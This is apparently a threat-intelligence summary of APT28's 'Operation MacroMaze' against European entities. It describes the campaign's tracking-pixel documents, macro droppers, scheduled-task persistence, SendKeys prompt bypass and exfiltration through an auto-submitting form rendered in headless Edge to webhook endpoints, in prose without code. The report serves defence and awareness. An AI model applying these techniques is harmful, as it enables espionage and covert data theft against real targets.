Key Findings

• Russia-linked APT28 targeted European entities with a webhook-based macro malware campaign called Operation MacroMaze from September 2025 to January 2026.

• The campaign used spear-phishing emails delivering weaponized documents with an "INCLUDEPICTURE" field pointing to a webhook[.]site URL hosting a JPG.

• When opened, the file silently retrieves the image, acting as a tracking pixel to alert attackers the document was viewed.

• Variants dropped modified macros that launched a VBScript triggering multi-stage execution, created a Scheduled Task for persistence, and used browser-based exfiltration to send stolen data to webhook[.]site endpoints.

• The campaign leveraged simple tools and legitimate services for infrastructure and data exfiltration, making detection and attribution more challenging.

Background

Russia-linked APT28 (aka UAC-0001, Fancy Bear, Pawn Storm, Sofacy Group, Sednit, BlueDelta, and STRONTIUM) has been active since at least 2007, targeting governments, militaries, and security organizations worldwide. The group was also involved in the 2016 U.S. Presidential election attacks.

APT28 operates out of military unity 26165 of the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (GTsSS). In January 2026, Zscaler ThreatLabz uncovered the campaign Operation Neusploit targeting Central and Eastern Europe, using weaponized RTF files and localized lures to deploy various implants.

Spear-Phishing and Weaponized Documents

The Operation MacroMaze campaign begins with spear-phishing emails delivering weaponized documents. These documents contain an "INCLUDEPICTURE" field pointing to a webhook[.]site URL hosting a JPG file.

• The INCLUDEPICTURE field is embedded in the document's XML and instructs Microsoft Word to retrieve the external image resource.

• When the document is opened and the fields are updated, an outbound HTTP request is generated to the remote server, effectively confirming the document has been viewed.

Malware Delivery and Execution

Variant malware samples dropped by the weaponized documents exhibit the following behavior:

• Four closely related macro variants act as droppers, each deploying six files (VBS, BAT, CMD, HTM, XHTML) into the %USERPROFILE% folder using GUID-like names.

• The macro launches a VBScript that triggers multi-stage execution, creates a Scheduled Task for persistence, and deletes traces.

• Over time, the variants evolved from simple document cleanup to more sophisticated techniques, including fake Word error messages and SendKeys-based UI manipulation to bypass security prompts.

• Two batch file variants use Microsoft Edge in headless mode or hide the browser off-screen to exfiltrate data.

Browser-Based Exfiltration

The final stage of the attack chain uses a browser-based exfiltration method to send stolen data to webhook[.]site endpoints:

• The HTML file is constructed by concatenating a static HTM file, the captured output of the reconstructed CMD payload, and a closing XHTML template.

• The initial HTM file defines an auto-submitting form that sends a POST request to a webhook[.]site endpoint, with the payload output embedded within the form.

• When the HTML file is rendered by Microsoft Edge, the form is automatically submitted, exfiltrating the collected data without user interaction.

Conclusion

The Operation MacroMaze campaign demonstrates that APT28 can leverage simple tools and legitimate services for effective data exfiltration. The use of webhook-based infrastructure, browser-based techniques, and evolving malware variants made this operation challenging to detect and attribute.

Sources

• https://securityaffairs.com/188421/apt/operation-macromaze-apt28-exploits-webhooks-for-covert-data-exfiltration.html

• https://unsafe.sh/go-397175.html